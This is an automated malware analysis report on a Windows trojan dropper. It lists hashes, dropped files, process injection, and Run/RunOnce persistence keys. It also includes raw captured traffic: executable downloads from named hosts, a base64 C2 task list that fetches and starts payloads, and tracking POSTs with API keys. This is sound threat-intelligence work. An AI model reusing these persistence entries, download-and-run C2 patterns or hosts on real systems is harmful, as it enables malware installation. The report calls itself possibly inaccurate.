Gen.Variant.Barys.51615_81205d5bf3

by malwarelabrobot on September 5th, 2017 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Barys.51615 (B) (Emsisoft), Gen:Variant.Barys.51615 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: 81205d5bf3be7b9d013df0f0987ca8c7
SHA1: da61cc5c8fc31c78ab1ab72b476dd37012e90a5d
SHA256: 0c19811fb9c81dadede1e569e959f53d79d66ed59146a389b7529b7593cb916b
SSDeep: 6144:b0QB7Dq/zvX3wFm9un4jt1kHRmLzXX3pFarGTw:T0vwFmXRM
Size: 243200 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2017-08-25 19:19:01
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

SecondL.exe:3716
Sho9libi.exe:2880
%original file name%.exe:2604
OneTwo.exe:2360

The Trojan injects its code into the following process(es):

%original file name%.exe:3436
RHELWSD0F.exe:3836
r4ypgv5dbyy.exe:1972

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process SecondL.exe:3716 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\13pqxsz543f\r4ypgv5dbyy.exe.config (1 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\13pqxsz543f\r4ypgv5dbyy.exe (204 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (856 bytes)

The process Sho9libi.exe:2880 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (860 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (860 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (860 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2880.344777 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2880.344777 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2880.344777 (0 bytes)

The process %original file name%.exe:3436 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\UHAS7BTKCT\SecondL.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\UHAS7BTKCT\OneTwo.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\UHAS7BTKCT\Sho9libi.exe (265666 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\UHAS7BTKCT\OneTwo.exe (45140 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\UHAS7BTKCT\Sho9libi.exe.config (1 bytes)
C:\config.conf (47 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\UHAS7BTKCT\SecondL.exe (1117 bytes)

The process OneTwo.exe:2360 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\RHELWSD0FK\RHELWSD0F.exe (156158 bytes)
%Program Files%\RHELWSD0FK\uninstaller.exe (66836 bytes)
%Program Files%\RHELWSD0FK\uninstaller.exe.config (1 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (852 bytes)
%Program Files%\RHELWSD0FK\RHELWSD0F.exe.config (1 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (852 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (852 bytes)

The Trojan deletes the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2360.342390 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2360.342390 (0 bytes)

The process RHELWSD0F.exe:3836 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\RHELWSD0FK\cast.config (36 bytes)

Registry activity

The process SecondL.exe:3716 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"EnableFileTracing" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process Sho9libi.exe:2880 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASMANCS]
"MaxFileSize" = "1048576"
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASAPI32]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

The process %original file name%.exe:2604 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

The process %original file name%.exe:3436 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\81205d5bf3be7b9d013df0f0987ca8c7_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\81205d5bf3be7b9d013df0f0987ca8c7_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\81205d5bf3be7b9d013df0f0987ca8c7_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\81205d5bf3be7b9d013df0f0987ca8c7_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\81205d5bf3be7b9d013df0f0987ca8c7_RASMANCS]
"EnableFileTracing" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_UDDB6" = "C:\%original file name%.exe"

The Trojan deletes the following value(s) in system registry:

The process OneTwo.exe:2360 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASMANCS]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASMANCS]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"EnableFileTracing" = "0"

The Trojan deletes the following value(s) in system registry:

The process RHELWSD0F.exe:3836 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\RHELWSD0F_RASMANCS]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\RHELWSD0F_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\RHELWSD0F_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\RHELWSD0F_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\RHELWSD0F_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\RHELWSD0F_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\RHELWSD0F_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\RHELWSD0F_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"D27LIUGNVB52SJ3" = "%Program Files%\RHELWSD0FK\RHELWSD0F.exe"

The process r4ypgv5dbyy.exe:1972 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"processname" = "iexplore.exe"
"WindowClassName" = "DDEMLMom"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"d3ydvryqdko" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\13pqxsz543f\r4ypgv5dbyy.exe"

Dropped PE files

MD5	File path
130d690f9f37a0a455d8ed3a54914cea	c:\Program Files\RHELWSD0FK\RHELWSD0F.exe
d6109f81634ff83fe1dd2d9ce1575762	c:\Program Files\RHELWSD0FK\uninstaller.exe
53a2efa3b8640fd38f8ebc91d2609f99	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\UHAS7BTKCT\OneTwo.exe
36fc263e8315ef086a9e9ae04192dbb9	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\UHAS7BTKCT\SecondL.exe
4c796c44d8ca098f90b6523a3c03614a	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\UHAS7BTKCT\Sho9libi.exe
10e7ab547686847964eb56910244e3e4	c:\Users\"%CurrentUserName%"\AppData\Roaming\13pqxsz543f\r4ypgv5dbyy.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: VFK0BUH
Product Name:
Product Version: 7.1.7.6
Legal Copyright: Copyright (c) 6411
Legal Trademarks:
Original Filename: JijiLaPute.exe
Internal Name: JijiLaPute.exe
File Version: 7.1.7.6
File Description: VFK0BU
Comments: V
Language: Language Neutral

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	8192	47108	47616	4.28813	b99ef727936fff17c89b6d6106924c9a
.rsrc	57344	194344	194560	3.79531	69bc05e286fa67d6b1d29bd6f6cee880
.reloc	253952	12	512	0.042395	6192891b82d91a777dbf5e9b1b3ce60e

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://bratitlamio.com/from_backup/747474/AdsShow_installer.exe	46.105.121.115
hxxp://bratitlamio.com/3/000000/wizzcaster_installer_v2.exe	46.105.121.115
hxxp://bratitlamio.com/exe/updater.exe	46.105.121.115
hxxp://bratitlamio.com/safe_download/582369/AdsShow.exe	46.105.121.115
hxxp://bratitlamio.com/download/3/wizzcaster_v2.exe	46.105.121.115
hxxp://bratitlamio.com/download/3/wizzcaster_uninstaller_v2.exe	46.105.121.115
hxxp://agent.wizztrakys.com/api/v5/config	94.23.44.92
hxxp://agent.wizztrakys.com/api/v5/link	94.23.44.92
hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load	94.23.44.92
hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok	94.23.44.92
hxxp://thegrandemanager.com/remotes_xml_sections.php	91.121.29.41
hxxp://ladomainadeserver.com/api/v5/link	188.165.209.131
hxxp://ladomainadeserver.com/api/v5/config	188.165.209.131

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

GET /download/3/wizzcaster_v2.exe HTTP/1.1

Host: bratitlamio.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sun, 03 Sep 2017 22:52:46 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="wizzcaster_v2.exe"

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: application/x-msdownload

167800..MZ......................@.....................................
..........!..L.!This program cannot be run in DOS mode....$.......PE..
L....r.Y.........."...0.............^.... ........@.. ................
....................@.....................................O...........
......................................................................
... ............... ..H............text...d.... ......................
 ..`.rsrc...............................@..@.reloc...............v....
..........@..B................@.......H........!.............../.. ...
.........................................0..........(....(.....~....(.
....~....(.....(......o........io.....(.....o....(....(........o....r.
..po.......o....t#..........%...o....&..&..*.................0..3.....
..(....~....o......s....%o .....o!...o".......&.....*.........,,......
.0..........s#......&.....*.................~r...p.....rY..p.....rs..p
.....*..($...*.~....-.r...p.....(%...o&...s'........~....*.~....*.....
..*.~....*..((...*Vs....()...t.........*BSJB............v2.0.50727....
..l...\...#~..........#Strings............#US.l.......#GUID...|...D...
#Blob...........W..........3........(...................).............
......................................4...........h...................
................T.....m.................&...........@.P.....P.........
..P...A...........4.H...K...........8.................|...........S.P.
..W.....j.......[.....P.................................f.P...........
..............H.V.=...........#.=.........7.#.q...................

<<< skipped >>>

GET /download/3/wizzcaster_uninstaller_v2.exe HTTP/1.1

Host: bratitlamio.com


HTTP/1.1 200 OK

Date: Sun, 03 Sep 2017 22:52:48 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="wizzcaster_uninstaller_v2.exe"

Transfer-Encoding: chunked

Content-Type: application/x-msdownload

b7200..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
....r.Y.........."...0.............>.... ........@.. ..............
......................@.....................................O.........
......................................................................
..... ............... ..H............text...D.... ....................
.. ..`.rsrc...............................@..@.reloc...............p..
............@..B................ .......H........!.............../....
...........................................0..........(....(.....~....
(.....~....(.....(......o........io.....(.....o....(....(........o....
r...po.......o....t#..........%...o....&..&..*.................0..3...
....(....~....o......s....%o .....o!...o".......&.....*.........,,....
...0..........s#......&.....*.................~r...p.....rY..p.....rs.
.p.....*..($...*.~....-.r...p.....(%...o&...s'........~....*.~....*...
....*.~....*..((...*Vs....()...t.........*BSJB............v2.0.50727..
....l...\...#~..........#Strings............#US.l.......#GUID...|...D.
..#Blob...........W..........3........(...................)...........
........................................4...........h.................
..................T.....m.................&...........@.P.....P.......
....P...A...........4.H...K...........8.................|...........S.
P...W.....j.......[.....P.................................f.P.........
................H.V.=...........#.=.........7.#.q.................

<<< skipped >>>

POST /remotes_xml_sections.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: thegrandemanager.com

Content-Length: 169

Expect: 100-continue

Connection: Keep-Alive


HTTP/1.1 100 Continue
....



remote_id=1&user_name=wemonetize&api_key=e721cfcc-2148-11e6-922f-0cc47
a47968c&buying_product_name=DefaultProduct&buying_partner_name=Default
Partner&buying_channel_name=1
HTTP/1.1 200 OK

Date: Sun, 03 Sep 2017 22:52:39 GMT

Server: Apache

Set-Cookie: PHPSESSID=8nfm55a3sr508vblu58t2etqi0; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Content-Length: 1608

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

PHVwZGF0ZXMgcmVmcmVzaD0iMTIwIj4KCjx0YXNrPg0KDQo8cGVyZm9ybT4NCg0KPGRvd2
5sb2FkIG5hbWU9IlNlY29uZEwiIHZhbHVlPSJodHRwOi8vYnJhdGl0bGFtaW8uY29tL2Zy
b21fYmFja3VwLzc0NzQ3NC9BZHNTaG93X2luc3RhbGxlci5leGUiIHZlcnNpb249IiIgIH
NvZnR3YXJlPSIiIG5ldD0ieWVzIiAvPg0KPHByb2Nlc3MgdHlwZT0ic3RhcnQiIG5hbWU9
IlNlY29uZEwiIHZhbHVlPSJub3R3YWl0IiBwYXJhbXM9Im5pbXBvcnRlIi8 DQo8bW9kIH
R5cGU9ImFkZCIgbmFtZT0iUXNPbmUiIHZhbHVlPSIxNzA5MDQiLz4NCg0KPC9wZXJmb3Jt
Pg0KDQo8Y29uZGl0aW9ucz4NCg0KPG1vZCB0eXBlPSJjaGVjayIgbmFtZT0iUXNPbmUiIH
ZhbHVlPSI0NTE3MDkwNCIgbWF0Y2g9ImZhbHNlIi8 DQoNCjwvY29uZGl0aW9ucz4NCjwv
dGFzaz48dGFzaz4NCg0KPHBlcmZvcm0 DQoNCjxkb3dubG9hZCBuYW1lPSJPbmVUd28iIH
ZhbHVlPSJodHRwOi8vYnJhdGl0bGFtaW8uY29tLzMvMDAwMDAwL3dpenpjYXN0ZXJfaW5z
dGFsbGVyX3YyLmV4ZSIgdmVyc2lvbj0iIiAgc29mdHdhcmU9IiIgbmV0PSJ5ZXMiIC8 DQ
o8cHJvY2VzcyB0eXBlPSJzdGFydCIgbmFtZT0iT25lVHdvIiB2YWx1ZT0ibm90d2FpdCIg
cGFyYW1zPSI1N2E3NjRkMDQyYmY4Ii8 DQo8bW9kIHR5cGU9ImFkZCIgbmFtZT0iSGFoYS
IgdmFsdWU9IjAwMDE3MDkwNCIvPg0KDQo8L3BlcmZvcm0 DQoNCjxjb25kaXRpb25zPg0K
DQo8bW9kIHR5cGU9ImNoZWNrIiBuYW1lPSJIYWhhIiB2YWx1ZT0iMTcwOTA0IiBtYXRjaD
0iZmFsc2UiLz4NCg0KPC9jb25kaXRpb25zPg0KPC90YXNrPjx0YXNrPg0KDQo8cGVyZm9y
bT4NCg0KPGRvd25sb2FkIG5hbWU9IlNobzlsaWJpIiB2YWx1ZT0iaHR0cDovL2JyYXRpdG
xhbWlvLmNvbS9leGUvdXBkYXRlci5leGUiIHZlcnNpb249IiIgIHNvZnR3YXJlPSIiIG5l
dD0ieWVzIiAvPg0KPHByb2Nlc3MgdHlwZT0ic3RhcnQiIG5hbWU9IlNobzlsaWJpIiB2YW
x1ZT0id2FpdCIgcGFyYW1zPSJ3ZSIvPg0KPG1vZCB0eXBlPSJhZGQiIG5hbWU9IkRhdGUi
IHZhbHVlPSJmZThmMTcwOTA0Ii8 DQoNCjwvcGVyZm9ybT4NCg0KPGNvbmRpdGlvbnM DQ
oNCjxtb2QgdHlwZT0iY2hlY2siIG5hbWU9IkRhdGUiIHZhbHVlPSIxNzA5MDQiIG1h

<<< skipped >>>

POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: agent.wizztrakys.com

Content-Length: 44

Expect: 100-continue

Connection: Keep-Alive

HTTP/1.1 100 Continue

....

api_key=fa02609b-2368-11e6-922f-0cc47a47968c

HTTP/1.1 200 OK

Date: Sun, 03 Sep 2017 22:53:57 GMT

Server: Apache/2.4.10 (Debian)

Set-Cookie: PHPSESSID=8l63rijr6t2n62od3jav7p76c7; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Access-Control-Allow-Origin: *

Content-Length: 29

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

{"message":"Track was added"}....

POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: agent.wizztrakys.com

Content-Length: 44

Expect: 100-continue

HTTP/1.1 100 Continue

....

api_key=fa02609b-2368-11e6-922f-0cc47a47968c

HTTP/1.1 200 OK

Date: Sun, 03 Sep 2017 22:53:57 GMT

Server: Apache/2.4.10 (Debian)

Set-Cookie: PHPSESS

GET /safe_download/582369/AdsShow.exe HTTP/1.1

Host: bratitlamio.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sun, 03 Sep 2017 22:52:46 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="AdsShow.exe"

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: application/x-msdownload

2000..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
..o..Y.........."...0.............V2... ...@....@.. ..................
..................@..................................2..O....@..L.....
...............`.......0..............................................
. ............... ..H............text...\.... ...................... .
.`.rsrc...L....@......................@..@.reloc.......`..............
........@..B................82......H.......("...............0........
.......................................0............s............,N.~.
...r...p.o......(....r]..pra..po....rc..p(....o....rc..p(....o......o.
..... Z.rg..p(.............,...........,.. `......o....Z(......rq..p(.
...&. `.......o....Z(......... .&....*...................0..4........r
...p..rg..p( .....,...r...p(!...("........ ... ..*".(#....*&.(#.....*.
.0..9........~.........,".r...p.....($...o%...s&...........~..... ..*.
...0...........~..... ..*".......*.0...........~..... ..*".('....*Vs..
..((...t.........*..BSJB............v2.0.50727......l...$...#~......|.
..#Strings........H...#US.T.......#GUID...d.......#Blob...........W...
.......3........$...................(.................................
..............D.=.....=...x.................'.................d.....}.
................6.............B.....B...I.B...5.......B...D.....[.....
..=.....]...........$.....$.....n..._.............B...V.....3.........
....B..._.B.....n...................:...=.............=.........d.

<<< skipped >>>

GET /from_backup/747474/AdsShow_installer.exe HTTP/1.1

Host: bratitlamio.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sun, 03 Sep 2017 22:52:42 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="AdsShow_installer.exe"

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: application/x-msdownload

2a00..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
.....Y.........."...0..............=... ...@....@.. ..................
..................@..................................<..O....@..4..
..................`.......;...........................................
.... ............... ..H............text... .... .....................
. ..`.rsrc...4....@....... ..............@..@.reloc.......`.......(...
...........@..B.................<......H........#...............:..
.............................................0..%.............(....(..
..r...pr...po....(......(....&.(....r...pr...po....r...p(....(........
 T..... ..........,........ #.....3..... ......,......X......X.... X..
.......-.....X.... ..........-.... ...... ..........,.........X.... ..
........-..(.....(...........%.r...p.%.ra..p.%.r...p.%.r...p.%.rG..p.%
.r[..p.%.rB..p.%.rR..p.%.r...p.%..r...p.%..rQ..p.%..r...p.%..r...p.%..
r:..p.%..r...p.%..r...p.%..r...p.%..r9..p.%..rQ..p.%..r...p.%..r...p.%
..r...p.%..r...p.%..r...p.%..r...p.%..r...p.(.......r...p(......(.....
.........,.....(....& ..r...p(....&.........*...A.....................
.......0..f........r...p.r!..p... ".. ..........,...r7..p(.........X..
 ..........-.s.......rG..p(....s.....o.....r...p.*".( ....*&.( .....*.
...0..9........~.........,".r...p.....(!...o"...s#...........~..... ..
*....0...........~..... ..*".......*.0...........~..... ..*".($....*Vs
....(%...t.........*..BSJB............v2.0.50727......l...$...#~..

<<< skipped >>>

GET /3/000000/wizzcaster_installer_v2.exe HTTP/1.1

Host: bratitlamio.com


HTTP/1.1 200 OK

Date: Sun, 03 Sep 2017 22:52:42 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="wizzcaster_installer_v2.exe"

Transfer-Encoding: chunked

Content-Type: application/x-msdownload

72600..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
....r.Y.........."...0..v............... ........@.. .................
...................@.................................D...O............
................`.....................................................
.. ............... ..H............text....u... ...v.................. 
..`.rsrc................x..............@..@.reloc.......`.......$.....
.........@..B................x.......H........!.............../..Xd...
........................................0..........(....(.....~....(..
...~....(.....(......o........io.....(.....o....(....(........o....r..
.po.......o....t#..........%...o....&..&..*.................0..3......
.(....~....o......s....%o .....o!...o".......&.....*.........,,.......
0..........s#......&.....*.................~r...p.....rY..p.....rs..p.
....*..($...*.~....-.r...p.....(%...o&...s'........~....*.~....*......
.*.~....*..((...*Vs....()...t.........*BSJB............v2.0.50727.....
.l...\...#~..........#Strings............#US.l.......#GUID...|...D...#
Blob...........W..........3........(...................)..............
................e.AssemblyTitleAttribute.AssemblyTrademarkAttribute.As
semblyFileVersionAttribute.AssemblyConfigurationAttribute.AssemblyDesc
riptionAttribute.CompilationRelaxationsAttribute.AssemblyProductAttrib
ute.AssemblyCopyrightAttribute.AssemblyCompanyAttribute.RuntimeCompati
bilityAttribute.GetValue.value.SameLife.exe.Encoding.FromBase64Str

<<< skipped >>>

GET /exe/updater.exe HTTP/1.1

Host: bratitlamio.com


HTTP/1.1 200 OK

Date: Sun, 03 Sep 2017 22:52:43 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="updater.exe"

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
27b200..MZ......................@.....................................
..........!..L.!This program cannot be run in DOS mode....$.......PE..
L....r.Y.........."...0...!.........> !.. ...@!...@.. .............
.......... (...........@...................................!.O....@!..
.....................(.......!........................................
...... ............... ..H............text...D.!.. ....!..............
... ..`.rsrc........@!.......!.............@..@.reloc........(.......'
.............@..B................  !.....H........!.............../...
. ..........................................0..........(....(.....~...
.(.....~....(.....(......o........io.....(.....o....(....(........o...
.r...po.......o....t#..........%...o....&..&..*.................0..3..
.....(....~....o......s....%o .....o!...o".......&.....*.........,,...
....0..........s#......&.....*.................~r...p.....rY..p.....rs
..p.....*..($...*.~....-.r...p.....(%...o&...s'........~....*.~....*..
.....*.~....*..((...*Vs....()...t.........*BSJB............v2.0.50727.
.....l...\...#~..........#Strings............#US.l.......#GUID...|...D
...#Blob...........W..........3........(...................)..........
.........................................4...........h................
...................T.....m.................&...........@.P.....P......
.....P...A...........4.H...K...........8.................|...........S
.P...W.....j.......[.....P.................................f.P........
.................H.V.=...........#.=.........7.#.q................<<< skipped >>>

POST /api/v5/config HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: ladomainadeserver.com

Content-Length: 38

Expect: 100-continue

Connection: Keep-Alive

HTTP/1.1 100 Continue

....

uid=57a764d042bf8&days_after_install=0

HTTP/1.1 200 OK

Date: Sun, 03 Sep 2017 22:52:48 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

Set-Cookie: laravel_session=ac4d38bd35719a3740693940c7873e1dd90854f4; expires=Mon, 04-Sep-2017 00:52:48 GMT; Max-Age=7200; path=/; httponly

Content-Length: 28

Keep-Alive: timeout=5, max=100

